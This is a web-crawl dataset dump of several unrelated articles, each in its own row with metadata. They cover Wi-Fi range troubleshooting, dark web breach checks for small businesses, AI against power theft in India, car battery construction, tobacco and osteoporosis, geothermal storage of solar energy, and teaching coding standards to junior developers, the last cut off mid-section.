text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62
values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1
value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
How to extend the range of your Wireless Network: Diagnosing a Problem Signal
Note: this article is primarily intended for smaller organizations
Wireless devices such as laptop computers use radio frequency (RF) waves to communicate with one another, and just like the radio waves that you hear on your car radio, the RF waves from a wireless access point (AP) — the device that links up your wired and wireless networks — get weaker and weaker the further away you get from the source. Moreover, metal, concrete, books, and other electronic devices can all interfere with a wireless signal, distorting it and limiting its range.
Before you can treat a temperamental signal, you need to make sure that the signal really is the problem. Here are some diagnostic tools and guidelines to help you get started.
Wireless Network Diagnostic Tools:
Site surveys can help you determine exactly where you have coverage and where you don’t. You can get a very rough measure of the strength of your signal by carrying a laptop around your organization and seeing how many “bars” you get. On a Windows XP/Vista/7 machine, you’ll see one to five bars in the lower right corner of the desktop; more bars indicate a stronger signal. To get a more precise measurement, you’ll have to download special software or buy a device specifically designed to measure the wireless signal. NetStumbler and InSSIDer software are free, but there are numerous other programs that can also help with this process.
Some factors that can cause a weak or distorted wireless signal:
1. Your wireless access point might not be in the best possible location.
3. Are the materials in your building part of the getting in the way? The signal from most access points will extend for about 300 feet in ideal circumstances. However, certain materials, such as concrete, books, and metal can attenuate or distort a wireless signal, so your range depends on the design and construction of your building. If you have a strong connection on one side of the wall, but no signal or a weak signal on the other side, there’s probably something in the wall blocking your signal.
4. Are there other electronic devices interfering with the signal from your access point? Today’s wireless equipment usually operates in the 2.4 GHz frequency of the electromagnetic spectrum. Unfortunately, there are several other common devices that use this same frequency. For instance, cordless phones, microwaves and garage door openers operate in the 2.4 GHz frequency. Cordless phones are especially troublesome, since they’re so prevalent. Furthermore, your access point might be conflicting with a neighbor’s access point. If your wireless signal is inconsistent then interference might be the problem. In other words, the signal gets weaker when the interfering devices are in use, and stronger when they’re not.
5. Are you using an old version of wireless? There have been three popular wireless standards: 802.11b, followed by 802.11g, succeeded by 802.11n. The latest standard, 802.11n, has twice the range of 802.11g or 802.11b, and it’s quite a bit faster. Now we have 802.11ac, which combines 2.4GHz channels and 5GHz channels for up to 1200Mbps. Channel width is also larger, which adds to interference problems.
1.Most access points broadcast to an equal distance in all directions. Putting the access point in a central location might allow the signal to reach more places in your building.
2.Putting the access point up high on a wall, or on the ceiling, can also increase your range. Increase the antenna gain or use a high gain omni antenna for central placement, sectorized antenna for outdoor wall placement, or directional patch antenna for narrow coverage.
3.Move your access point away from any materials that might be distorting the signal (such as concrete, metal, books, and so on). Upgrade your wireless access point to a 802.11AC wireless access point.
4.Move your access point away from any electronic devices that might be distorting the signal (for example, microwave ovens, cordless phones, and so on).
5.Change the channel. Wireless devices in the United States operate on one of 11 different channels. When two devices are using the same channel, the interference and signal distortion is greater. Furthermore, several of the channels overlap with one another. So if one device uses channel 3, and another device uses channel 4, the interference will still be strong if the devices are close to one another. The “non-overlapping channels” are 1, 6, and 11. Choose one of these 3 channels to start with, and if your signal is still weak, switch to another. For more information on changing the channel, see the manual that came with your access point. Newer access points sometimes ship with default of “Auto Channel Selection”, which will automatically select the best channel to use for your setup.
6.Buying a stronger antenna for your access point or your wireless adapter could boost the strength of the signal. However, a lot of wireless manufacturers design their equipment so the antennae can’t be replaced, so check your manual first.
7.Buy another access point and configure it as a wireless repeater or hardwire in the area with little or no coverage from your main access point. Assign the same SSID to the second access point as you assigned to the first access point so that laptops can seamlessly transfer their connection from one AP to the other. Repeat until you have the coverage you need. (The SSID is the name that your access point uses to identify itself. When laptop users are looking for a wireless signal to connect to, they’ll see your SSID if they’re within range of your access point.)
8.Consider buying a wireless repeater (sometimes know as a range extender or a range expander). This device will receive a wireless signal and then retransmit and amplify that signal (in other words, “repeat” it), which could effectively double the size of your wireless network. However, a repeater will also cause your wireless network to slow down somewhat. There are several brands of repeaters on the market. However, sometimes you can take a regular access point and configure it to act as repeater. Check the manual that came with your access point for more instructions.
9.Switch to 802.11n or 802.11ac wireless equipment (sometimes known as MIMO equipment). 802.11n equipment looks and acts more or less like older wireless equipment (for example, 802.11g equipment and 802.11b equipment), except that it’s faster and it has better coverage. 802.11ac is the same as well, just faster, and larger channel width options and sometimes comine frequencies.
All of your equipment has to comply with the new standard in order to take advantage of the gains in speed and range. Therefore, you’ll have to buy new access points and new wireless adapters in order to see the benefits of the newer 802.11 band.
For more information, visit www.gnswireless.com | <urn:uuid:e3f7bce8-b32e-46d9-8543-bfa85e92eada> | CC-MAIN-2024-38 | https://www.gnswireless.com/info/how-to-extend-range-of-wireless-network/ | 2024-09-08T22:32:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651035.2/warc/CC-MAIN-20240908213138-20240909003138-00128.warc.gz | en | 0.930213 | 1,499 | 3.234375 | 3 |
What is the Dark Web?
The dark web is a part of the internet that is not indexed by search engines and can only be accessed through a specialized web browser. It operates with a high degree of anonymity. It works by routing all communications through multiple servers in different parts of the world and encrypting it at every step.
Because of its anonymous and uncensored nature, the dark web can be used for both legal and illegal applications. Unknown to many, is that the dark web was conceived and prototyped by military researchers at the US Naval Research lab who had recognized that the open internet was extremely vulnerable to surveillance. Today, the dark web is not only used by the military, but is open for everyone.
The dark web is filled with a hive of activities. You can buy anything including guns, drugs, computers, phones, hacked accounts, credit cards, and software. You can also hire a hacker to execute a cyber-attack. Most frightening is that you can hire an assassin to kill someone.
How does my Information get on the Dark Web?
As you already know, the dark web is full of hackers and all sorts of criminals who target almost anyone. For these hackers, small businesses are no exception to their attacks. For this reason, it is not uncommon to find your information on the dark web.
Criminals will steal your information in a variety of ways. Some attempt to collect your information through phishing attacks. Others will hack into your accounts by cracking passwords or by using malware that captures your passwords, financial information, and other sensitive information. However, not all of them are high-tech. Some criminals are known to go through trash looking for documents containing personal data.
Once these attackers have your information, they might auction it to the highest bidder or post it on dark web forums for the world to see.
What are the Top Ways to determine if my Accounts have been exposed?
Due to the uncensored nature of the dark web, it is very difficult to know if your information has found its way there. There are thousands of hacking forums bringing together millions of hackers from all over the world.
Here are the two ways to determine if your accounts have been exposed:
1. Conduct a Dark Web Scan
Cybersecurity organizations have built tools that will scan the dark web for any traces of your information. HacWare's Security Awareness solution does offer continuously dark web monitoring to search for your accounts that are connected to breaches and will send you an alert when someone with your company email domain has been found. There is another website that offers dark web scanning for small businesses is Connections for Business. They only require some personal details then they will scan the dark web for any traces of your information and email to you the report.
2. Search your Details in Breaches Databases
You can also search for your information in data breach databases. These databases keep track of the known data breaches and store searchable information in publicly accessible websites. The biggest and most popular is Have I Been Pwned. This database was created in 2013 by Troy Hunt, a Microsoft regional director, and MVP.
With over two hundred thousand visitors each day, four million email subscribers, and information of more than eleven billion compromised accounts, it is by far the biggest and most popular way to detect if your data was breached. You start by feeding in your email and within seconds, your email will be searched across billions of breached information. If your information is found, details of the data breach will appear.
What Next if your Accounts have been Exposed?
It is very scary to find out that your personal information has been exposed. Luckily, you can still regain control even if your information was breached. Before you take the next steps, it is vital to find out the extent of the data breach. Once you have this information, you can take the following steps.
1. Change Exposed Passwords
It is a good thing to constantly change your password. In the event of a data breach, it is especially important to change the affected passwords to something strong, secure, and unique. A strong password, in general, should have at least 8 characters made up of letters, numbers, and symbols.
You should consider using a password manager such as 1Password to help generate and keep track of strong passwords.
2. Enable 2-Factor Authentication
In addition to changing your passwords, you should sign up for two-factor authentication (Also known as two-step verification or 2FA). This is an additional layer of security offered by many services today such as Facebook and Gmail. With 2FA, your accounts will require an additional level of authentication such as a one-time code sent to your email or phone. This means that even if attackers have your password, they cannot access your account without the second part of the verification process.
3. Freeze your Financial Accounts
If you find out that attackers have your financial information, you can contact your bank asking them to freeze any transactions in your name. This is a temporary move to prevent attackers from making transactions in your name. This is most applicable when you find out that your credit card information was breached. Once you regain access, you can unfreeze your accounts at your convenience.
4. Communicate that there was a breach with your stakeholders and customers.
Tough communication is a form of security awareness. It builds trust with customers and is the first step to repairing any reputational damage.
Today, everyone is a potential target for cyber-attacks. Large multinational corporations and small businesses are targeted alike. The dark web offers uncensored and anonymous platforms where these attackers can plot their moves and auction your information or expose it for the world to see. Small businesses must be constantly on the watch for potential attacks. If you find out that your information was breached, you should take action without delay.
Want to Learn More?
Learn more about HacWare at hacware.com. If you are a Managed Security Service provider (MSSP) or IT professional, we would love to automate your security education services, click here to learn more about our partner program. | <urn:uuid:9fce99b8-74bd-4a24-925b-e8823dd03ac4> | CC-MAIN-2024-38 | https://www.resources.hacware.com/how-to-dark-web-scan-your-small-business | 2024-09-08T22:41:00Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651035.2/warc/CC-MAIN-20240908213138-20240909003138-00128.warc.gz | en | 0.956351 | 1,252 | 2.75 | 3 |
India is probably the only country in the world to provide free power to all of their farmers, as these folks provide the nation much needed food for survival. However, only a few states like Telangana are genuinely offering free power to farmers, in a hope of stealing political mileage in the upcoming elections.
But this can only lead to success when the power generation goes in balance with the earned revenue. And that’s not taking place in practical, as most of the power distributed to farmers is being misused and so is going unaccounted for different reasons. Thus, bringing down huge losses to the whole of the Indian Sub Continent.
However, the central government, led by Honorable Prime Minister Shri Narender Modi, seems to take stringent action against such malpractices from now on. They are planning to use Artificial Intelligence(AI) technology and other Machine Learning(ML) tools to keep a check on power thefts and the power wastage observed in offering free power to the farmers.
And a plan is being drafted to channelize the generated power units in a resourceful way, thus cutting down thefts, spillage and misuse.
Under the Revamped Distribution Sector Scheme (RDSS) and as per the accounted reports, the technical and commercial loss of electricity is estimated to be 17% in FY22. Coming way down from 22% the previous year.
This year, the government(FY23) is planning to leverage advanced information and communication technologies by using the power of AI/ML. Aim is to curb power thefts and cut down loss incurred through misuse.
According to the Indian Ministry of Power, installing prepaid smart meters in the model of the UK can play an active role in reducing power distribution losses in utilities. As it helps in keeping a balance of money spent on generation and usage, tightly; with less or zero human intervention in keeping a tab on energy accounting and revenue auditing.
Along with smart metering, and feedback from Advanced Metering Infrastructure, system metering- at feeder, transformer and consumer premises might also help in generating a healthy revenue for discoms, that are already jostling with losses, for reasons.
Out of 1,491,850 billion units generation of power in FY 2021-2022, only 51% of it has made the cash registers ringing. Rest all was either being wasted or going unaccounted.
Thus, to keep a check on the unaccounted usage, the Indian government led by the BJP government is interested in using AI technology and ML tools to eradicate anomalies in power distribution and revenue generation.
A Ministerial meeting with the head of the state’s, i.e. Chief Ministers, will be scheduled in May this year and a final decision will be taken thereafter. | <urn:uuid:fec44450-bc67-4c82-8c4c-ee50eef507c1> | CC-MAIN-2024-38 | https://www.cybersecurity-insiders.com/india-to-use-artificial-intelligence-to-curb-power-thefts-and-check-usage/ | 2024-09-10T03:32:10Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00028.warc.gz | en | 0.951389 | 561 | 2.5625 | 3 |
An automotive battery is an electrochemical device (a device that uses both electrical energy and chemical energy to operate) that stores and produces electric current and voltage. A conventional automotive battery is also called a lead-acid battery because of the materials used in its construction.
A volt battery is made up of a group (or “battery”) of cells that generate an electric charge. A basic battery cell can be made by placing two dissimilar metal electrodes (metal plates that can donate and receive electrons) into an acid-filled container. Electrons are pulled from one electrode and attracted to the other, producing an electric current. See Figure 2.
Figure 2. A basic battery cell can be made by placing two unlike metal electrodes in a jar of sulfuric acid. A chemical reaction occurs in which electrons flow between the two electrodes.
Battery Cell Construction
The parts of a basic battery cell include:
Positive plates—electrodes of lead peroxide (PbO2).
Negative plates—electrodes of finely ground or powdered lead (Pb).
Electrolyte—a solution of sulfuric acid (H2SO4) and water (H2O).
Separators—material that keeps the positive and negative plates from touching and creating a short circuit.
Battery plates are made of a stiff mesh grid coated with porous lead alloys. See Figure 3A. The chemically active material in the negative plates is sponge lead (lead that has been finely ground or powdered to increase its porosity).
Since the lead on the plates is porous, like a sponge, the sulfuric acid easily penetrates into the lead. This helps the chemical reaction and the production of electricity.
A—Positive and negative plates. Notice the position of the tabs on the top edge. These tabs contact the plate strips to conduct electricity.
B—The plates in the positive and negative plate groups are interspersed, with separators to keep the plates from touching and shorting out.
C—A plate strap holds each battery element together. The plate straps placed end-to-end to conduct electricity from one cell to another. The terminal posts are usually formed onto the ends of the plate straps.
The active material on the positive plates is lead per-oxide. Calcium or antimony is added to the lead to increase battery performance and to decrease gassing (the formation of explosive hydrogen gas during the chemical reaction).
Several battery plates are needed in each cell to provide enough battery power for automotive use. See Figure 3B. A metal plate strap is used to join several negative plates to form a negative plate group. Another plate strap links the positive plates to make a positive plate group.
The connectors in each cell are placed in contact with the connectors in the adjacent cells so that electricity can be conducted along the length of the battery. See Figure 3C. The battery terminals (posts or side terminals) are constructed as part of the end connectors.
Separators fit between the battery plates to keep them from touching and shorting against each other. The separators are made of a porous insulating material that allows free circulation of the electrolyte around the plates.
The negative plate group, positive plate group, plate straps, and their separators make up a battery element; whereas, the battery cell contains these elements plus electrolyte. Refer again to Figure 3C.
The electrolyte in an automotive battery, often called battery acid, is a mixture of sulfuric acid and distilled water. This mixture is poured into each cell until the plates are covered to complete the functional battery cells.
The automotive battery case encloses the battery cells. It is usually made of high-quality polypropylene. The case must withstand severe vibration, cold weather, engine heat, extreme temperature changes, and the corrosive action of the battery acid. Dividers in the case form individual containers for each cell.
The battery cover is bonded to the top of the battery case. It seals the top of the case and provides an opening above each battery cell for battery caps or a cell cover. Refer to Figure 4.
Figure 4. Cutaway view of an automotive battery showing inside and outside components. (Delco)
Automotive Battery Terminals
Battery terminals provide a means of connecting the battery plates to the vehicle’s electrical system. They are usually formed as part of the end connectors. Two battery posts or side terminals can be used. Some large truck batteries have threaded posts, as shown in Figure 5.
Figure 5. Basic terminal types. Side terminals are becoming more common because they resist corrosion very well.
Battery posts are round metal terminals sticking out of the top of the battery cover. They serve as male connections for female battery cable ends. The positive post is larger than the negative post. It may be marked with red paint and a positive (+) symbol. The negative post is smaller and may be black or green in color. It normally has a negative (–) symbol on or near it.
Side terminals are electrical connections on the side of the battery. They have female threads that accept a special bolt on the battery cable end. Side terminal polarity is identified by positive and negative symbols on the case.
Automotive Battery Charge Indicator
A battery charge indicator, or hydrometer, measures the specific gravity of the electrolyte in the battery as a measure of the general charge level of the battery. Refer again to Figure 4.
Specific gravity is the density of a solution relative to water, which has a density of 1. As the battery weakens, the specific gravity of its electrolyte becomes closer to 1.
The charge indicator changes color with changes in battery charge, as shown in Figure 6. For example, the indicator may be green when the battery is fully charged. It may turn black when the battery is discharged or yellow when the battery needs replacement.
Figure 6: A-The hydrometer is mounted in the battery cover. The small float ball floats higher when acid strength and state of charge are high. B—Operation of an automotive hydrometer.
Battery Tray and Retainer
A battery tray and retainer hold the battery securely in place. They keep the battery from bouncing around during vehicle movement. It is important that the tray and retainer be in good condition and tight to prevent battery damage. See Figure 7.
Figure 7. The battery sits on the battery tray. The retainer holds the battery in the tray during vehicle movement. (Cadillac)
Automotive Battery Cables
Battery cables are large conductors that connect the battery terminals to the electrical system of the vehicle. See Figure 8A. The positive battery cable is normally red and fastens to the starter solenoid. The negative battery cable is usually black and connects to ground on the engine block.
In some vehicles, the negative battery cable has a body ground wire to ensure that the vehicle body is grounded, as shown in Figure 8B. If this wire does not make a good connection, a component grounded to the vehicle’s body may not operate properly.
Figure 8. The automotive battery cable may be connected to the vehicle’s electrical system in slightly different ways, depending on the make and model.
Sometimes a battery junction block is placed between the positive battery terminal and the solenoid. This junction block allows other wires to make electrical contact with the positive battery cable to power the dash and accessories. See Figure 9. In other vehicles, the starter solenoid may serve the same function.
Figure 9. A junction block may be used so that other wires can obtain power from positive battery cable | <urn:uuid:7a851cef-6f7a-439d-9904-73f1e34d4344> | CC-MAIN-2024-38 | https://electricala2z.com/tech/automotive-battery/ | 2024-09-11T06:10:49Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651344.44/warc/CC-MAIN-20240911052223-20240911082223-00828.warc.gz | en | 0.935848 | 1,563 | 3.875 | 4 |
Tobacco Consumption Causes Osteoporosis, Say Experts
Tobacco consumption could lead to osteoporosis.
According to medical experts, prolonged tobacco consumption reduces bones’ ability to maintain and repair and they get weak and prone to fractures, especially those above 40 years of age.
Prof Shah Waliullah, senior faculty at the orthopaedic department of King George’s Medical University (KGMU), said, “Bones have two types of cells called osteoclasts and osteoblasts. They are responsible for making and breaking bones. Osteoclasts are the cells that break bones in so that they can be remodelled, while osteoblasts form new bones after breakage done by the prior and this procedure keeps going on continuously.”
However, it is seen that in those who consume tobacco for a long time, be it in the form of smoking or chewing, the number of osteoclasts increases while osteoblasts decrease. Eventually, it causes Osteoporosis because bone density goes down.
Another orthopaedic surgeon at KGMU, Dr Mayank Mahindra said, “We see this tobacco-induced osteoporosis among middle-aged patients. They often start consuming tobacco in their teens and by the age of 35-40 years, they get this disease.”
Prof Vikram Singh of Ram Manohar Lohia Institute of Medical Sciences (RMLIMS) said, “Quitting smoking and other forms of tobacco consumption while maintaining a healthy lifestyle can prevent osteoporosis.”
This site uses Akismet to reduce spam. Learn how your comment data is processed. | <urn:uuid:b914e11d-9713-4e7c-abe1-18c1c569dd88> | CC-MAIN-2024-38 | https://www.abijita.com/tobacco-consumption-causes-osteoporosis-say-experts/ | 2024-09-11T07:28:21Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651344.44/warc/CC-MAIN-20240911052223-20240911082223-00828.warc.gz | en | 0.936247 | 349 | 2.828125 | 3 |
The sprawling landscapes of Kern County, California, tell a tale of transformation. Formerly known for its extensive oil production, the region is now at the forefront of an innovative shift toward sustainable energy. The heart of this change lies in a groundbreaking project called Geological Thermal Energy Storage (GeoTES), which aims to repurpose depleted oil wells into vessels of solar energy storage. This pioneering venture aligns seamlessly with California’s ambitious goal to achieve carbon-neutral energy production by 2045.
Harnessing the Power of the Sun with GeoTES
Kern County’s depleted oil wells are finding new life through GeoTES technology. GeoTES is designed to store solar energy as heat within the geological formations that once held oil. The process involves heating groundwater by using solar power, thereby transforming the former oil reservoirs into energy storage systems. This innovative approach not only makes use of existing infrastructures but also avoids the environmental pitfalls associated with traditional battery storage.
The environmental advantages of GeoTES are significant. Unlike lithium-ion batteries that depend on mining rare metals, GeoTES relies on natural geological formations. This method minimizes environmental disruption and aligns perfectly with the goal of sustainability. Furthermore, the efficiency of repurposing oil wells reduces the need for new construction, thereby cutting down on additional environmental impacts.
Repurposing these wells offers a dual benefit: it helps meet energy storage needs while also contributing to the global push toward renewable energy sources. As the sun shines in abundance over California, the ability to store this energy efficiently is a game-changer for both the local community and the broader energy market.
Economic Revitalization and Job Creation
One of the most compelling aspects of the GeoTES project is its potential to revitalize the local economy. Kern County has long been dependent on oil for its economic stability, and the shift towards clean energy presents a unique opportunity for the region. The transition is not just about clean energy; it’s also about preserving jobs and creating new ones.
The skills of the local workforce, honed over years in the oil and coal industries, are directly transferable to the new clean energy projects. Former oil workers, geologists, and engineers can apply their expertise to manage and maintain GeoTES systems, ensuring a smooth transition and retaining valuable employment opportunities in the region.
Moreover, the shift to clean energy projects promises to attract new investments and spur economic growth. By leading the way in innovative energy storage solutions, Kern County can establish itself as a hub of cutting-edge technology and sustainability. This economic diversification is crucial for long-term stability and growth, making the GeoTES project a win-win scenario for the region.
Aligning with California’s Carbon-Neutral Goals
California has set an ambitious target to achieve carbon neutrality by 2045, and the GeoTES project is a significant step towards this goal. By providing a scalable, sustainable solution for energy storage, GeoTES supports the broader effort to transition away from fossil fuels and reduce greenhouse gas emissions.
The impact of GeoTES is far-reaching. By storing solar energy effectively, it ensures a consistent power supply even when the sun isn’t shining. This reliability is crucial for the adoption of renewable energy sources like solar and wind, which are inherently intermittent. GeoTES thus plays a pivotal role in integrating renewable energy into the grid, making it feasible for California to meet its carbon-neutral objectives.
Furthermore, projects like GeoTES demonstrate how existing industrial infrastructures can be repurposed for environmental benefit. This approach reduces the need for new land use and construction, further minimizing the carbon footprint of clean energy initiatives. By leading the way in innovative energy solutions, California sets a powerful example for other regions and countries aiming for sustainability.
Technological Innovations in Energy Storage
The GeoTES project showcases remarkable technological innovation by repurposing oil wells for energy storage. Traditional energy storage methods like lithium-ion batteries have several drawbacks, including reliance on rare metals and challenging environmental footprints. GeoTES, on the other hand, leverages well-established geothermal principles uniquely adapted for solar energy storage.
In the GeoTES system, solar energy is used to heat groundwater stored in the geological formations of depleted oil reservoirs. This heated water can then be brought to the surface and used to generate electricity using conventional steam turbines when there is a demand for power. This method efficiently stores and releases energy, providing a reliable power source without the environmental hazards of traditional battery storage.
Moreover, the technology behind GeoTES is scalable. It can be implemented across various locations with depleted oil reserves, making it a versatile solution for energy storage needs. The potential to power hundreds of thousands of homes with stored solar energy highlights the extensive impact this technology can have on the energy landscape.
Addressing Environmental Challenges
The vast and varied landscapes of Kern County, California, narrate a compelling story of change. Known primarily for its rich history in oil production, this region is now emerging as a leader in the push for sustainable energy solutions. At the core of this transformation is an innovative initiative dubbed Geological Thermal Energy Storage (GeoTES). This project intends to repurpose exhausted oil wells, transforming them into storage units for solar energy.
GeoTES stands as a beacon of progress, reflecting California’s broader commitment to a cleaner, sustainable future. By converting these wells, what once served to extract fossil fuels will now be pivotal in storing renewable energy. This strategic pivot not only extends the life and utility of existing infrastructure but also mitigates the environmental impact associated with traditional energy sources.
Aligning closely with the state’s bold objective to achieve carbon-neutral energy by 2045, GeoTES represents a monumental step forward. It illustrates a creative solution to one of the significant challenges in renewable energy—how to store it efficiently for use when the sun isn’t shining. The success of GeoTES could serve as a model for other regions and ultimately play a crucial role in reducing greenhouse gas emissions.
In essence, Kern County is transforming its legacy of oil into a promising future of solar energy, demonstrating that innovation and sustainability can indeed go hand in hand. | <urn:uuid:06795633-c611-47f1-8348-9460759f1a35> | CC-MAIN-2024-38 | https://energycurated.com/environmental-and-regulations/transforming-oil-wells-into-eco-friendly-solar-energy-storage-systems/ | 2024-09-12T13:23:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651457.35/warc/CC-MAIN-20240912110742-20240912140742-00728.warc.gz | en | 0.909479 | 1,274 | 3.046875 | 3 |
Imagine if every musician in an orchestra decided to play their own version of Beethoven’s Symphony No. 9. The result would be chaotic, to say the least. This is exactly what happens in web development projects when developers do not follow a common set of coding standards. I invite you to explore the melodious world of coding standards.
In this article, we’ll dissect these standards piece by piece, not only to understand what they are but also to learn how to effectively teach them to the next generation of web maestros – our junior web developers.
Chapters to Tune Into:
- Decoding the Standards: What Are Coding Standards?
- Conducting the Orchestra: Teaching Coding Standards Effectively
- Tools of the Trade: Linters, Formatters, and Other Aides
- Rehearsing the Code: Practice Techniques for Juniors
- Encore: Cultivating a Culture of Quality and Consistency
1. Decoding the Standards: What Are Coding Standards?
Just as every well-composed piece of music has a structure that musicians understand and follow, coding standards provide a framework that developers use to write their code. These standards are the sheet music of programming, guiding developers through the complex symphony of software development.
Coding standards are crucial for ensuring that a codebase is maintainable, scalable, and understandable. Here’s a more detailed look at the key areas of coding standards:
1.1. Naming Conventions
Naming conventions are critical because they help ensure that the code is intuitive and that its intent is immediately clear to any developer (or future you). Good naming conventions streamline the process of understanding the software, making it easier to maintain and modify. Here are some general principles:
- Descriptive Names: Use names that describe what the variable, function, class, or module does. For instance, a function name like calculateTotalWeight() is preferable to a vague name like doTheThing().
- Consistency: Stick to a particular pattern throughout your project. For example, if you’re using camelCase for variables, continue to use camelCase throughout your codebase.
- Avoid Abbreviations and Single Letter Names: Except for common practices (like i for loop indices), avoid abbreviations and single letters. Names like userList are better than uL.
- Context Matters: Choose names appropriate to the context and that provide clear information about their use.
To read next: Programming Languages 101.
1.2. Formatting Rules
Formatting involves the physical appearance of the code. While it may not affect the functionality, proper formatting makes the code more readable and organized. Key aspects include:
- Indentation and Spacing: Consistent use of indentation (spaces vs. tabs, the number of characters per indent) defines hierarchical relationships between lines of code.
- Braces Style: Whether you place braces on the same line as the function, class, or control statement, or on a new line, keep it consistent.
- Line Length: Avoid lines that are too long; they should be easy to read on a standard screen without scrolling horizontally.
- File Structure: Organize code files logically. Group similar functions together and separate distinct components appropriately.
1.3. Commenting Practices
Comments in the code should help explain the “why” behind the “what.” Comments are not a substitute for poor naming but are there to provide additional clarity and reasoning:
- Relevant Comments: Comments should add value, explaining why something is done a certain way if it’s not immediately obvious.
- Maintain Comments: Outdated comments are as harmful as outdated code. Ensure comments are updated alongside the code they describe.
- Avoid Over-Commenting: Don’t state the obvious; focus on the complexities and nuances that might not be immediately evident from the code alone.
1.4. Error Handling
Effective error handling is crucial for building reliable and robust applications. It involves anticipating and coding for possible errors that might occur during execution.
- Use Exceptions Rather Than Return Codes: Exceptions can’t be ignored easily and separate the error-handling code from the main logic.
- Provide Useful Error Messages: When throwing exceptions, provide messages that can help diagnose issues quickly.
- Consistency: Use a consistent strategy across the whole application for managing exceptions.
- Fail Fast: Where possible, make the code fail as soon as an error condition is detected. This simplifies debugging and often secures the system.
1.5. Architecture Guidelines
Architecture guidelines ensure that the code not only meets the current requirements but is also adaptable to changing needs without requiring a complete rewrite.
- Modularity: Design the system as a set of modular components, which can be developed, tested, reused, and updated independently.
- Layering: Use layers to separate concerns, such as separating the data access layer from the business logic layer and the presentation layer.
- Use Design Patterns Where Appropriate: Design patterns are tried and tested solutions to common problems. Using them can help avoid subtle issues that can cause major problems.
- Code Reusability: Aim for reusability through components and modules. This reduces duplication, which in turn reduces the potential for errors and maintenance overhead.
Adhering to these guidelines helps in creating a codebase that is efficient, understandable, and maintainable. Remember, the ultimate goal of coding standards is to enhance productivity and foster a code environment that allows teams to collaborate more effectively.
Also read: What is a Sandbox?
In the next chapter, we’ll explore how to conduct this orchestra, creating a symphony of coders who play in perfect harmony through the effective teaching of coding standards. Stay tuned, and remember, in coding as in music, practice doesn’t make perfect, perfect practice makes perfect!
2. Conducting the Orchestra: Teaching Coding Standards Effectively
As the conductor of an orchestra shapes the overall sound of the ensemble, so too must educators shape the coding habits of junior web developers. Teaching coding standards effectively isn’t just about dictating rules; it’s about engaging with your ensemble—your students—in a way that inspires them to embrace these practices as their own.
2.1. Start with the Why
Before diving into the hows, start with the whys. Explain the chaos of a codebase where everyone codes in their own style—akin to an orchestra where every tuba player decides on a different tune. Highlight how standards improve readability, reduce errors, and make maintenance easier, much like how sheet music keeps the orchestra in sync.
2.2. Interactive Examples
Use real-world scenarios to illustrate good and bad practices. Just as a side-by-side comparison of a symphony’s performance with and without a conductor can be enlightening, comparing well-structured code against a messy one can highlight the benefits of following standards.
2.3. Peer Reviews
Encourage code reviews among peers to foster a community learning environment. Like section rehearsals where musicians fine-tune their performance together, code reviews help developers learn from each other and enforce standards naturally.
2.4. Consistent Feedback
Offer continuous feedback, not unlike a conductor’s subtle cues during a performance. This can be through regular check-ins or automated feedback tools. The goal is to guide, not to scold.
2.5. Gamify the Learning
Incorporate elements of gamification like badges or scores for adhering to standards. It’s like turning practice sessions into a playful competition, but instead of striving for the loudest note, the aim is for the cleanest code.
To read next: Software 2.0: The Evolution of Coding.
3. Tools of the Trade: Linters, Formatters, and Other Aides
Just as a musician relies on their instrument’s tuner or a metronome to ensure their performance is pitch-perfect, developers have their own tools to ensure their code is clean, efficient, and in tune with established standards.
» See: What are Linters? [Codacy]
If linters are the critics, formatters are the stylists. Tools like Prettier take your raw, unpolished code and reformat it into a stylistically consistent piece. It’s as if you handed your handwritten score to a copyist who returns a beautifully notated manuscript.
3.3. Integrated Development Environments (IDEs)
These are the full orchestral scores that contain all the parts for each instrument. IDEs like Visual Studio Code or JetBrains WebStorm come with built-in support for linters and formatters, and often provide real-time feedback and suggestions, much like a conductor providing real-time cues to an orchestra.
3.4. Version Control Systems
Think of these like rehearsal recordings. Tools like Git help manage changes in the codebase, allowing developers to revert to earlier versions if something goes awry, akin to a conductor reviewing a rehearsal tape and deciding to take a different approach to a particular passage.
3.5. Automated Code Review Tools
These can be likened to session recordings reviewed by an expert. Services like CodeClimate or SonarQube provide automated code reviews, highlighting potential issues and suggesting improvements based on predefined standards.
By leveraging these tools, we can ensure that every piece of code not only performs well but also plays beautifully in the grand symphony of a project. Remember, the goal is to make the code sing, and these tools are here to tune the voices.
To read next: Python Tic-Tac-Toe Game.
4. Rehearsing the Code: Practice Techniques for Juniors
Every musician knows that the key to a flawless performance is relentless practice. Similarly, junior web developers must hone their coding skills through constant practice, focused not just on solving problems, but on solving them right. Here’s how to make these practice sessions both beneficial and engaging:
4.1. Code Katas
Like scales in music practice, code katas are small, repeatable exercises that help developers refine their skills through repetition and variation. These exercises should focus on applying coding standards in a variety of scenarios, reinforcing the habits that make great code.
4.2. Pair Programming
Think of this as a duet, where two developers share a single workstation. One writes the code, while the other reviews each line as it is written. This not only improves code quality but also enhances learning, as the ‘observer’ can suggest adherence to coding standards in real-time.
4.3. Project-Based Learning
Assign small projects that require juniors to start from scratch, building their codebase with adherence to standards from the ground up. It’s like composing a short piece of music—they get to understand how each part fits into the larger whole.
4.4. Refactoring Sessions
Organize sessions where the sole focus is to refactor existing code to improve readability and efficiency while adhering to coding standards. This is akin to revising a piece to perfection, ensuring every note is in its right place.
4.5. Regular Quizzes
Implement short, frequent quizzes on coding standards. Like theory tests in music education, these help reinforce the knowledge and ensure juniors can recall and apply the standards when needed.
To read next: Start Your Python Journey: Project MiniPass.
5. Encore: Cultivating a Culture of Quality and Consistency
The grand finale in teaching coding standards is establishing a culture where quality and consistency are not just encouraged but celebrated. Here’s how to cultivate this environment:
5.1. Recognize and Reward
Just as standing ovations celebrate outstanding musical performances, recognize developers who consistently adhere to coding standards. Implement reward systems, like ‘Coder of the Month’, based on code quality metrics.
5.2. Consistent Messaging
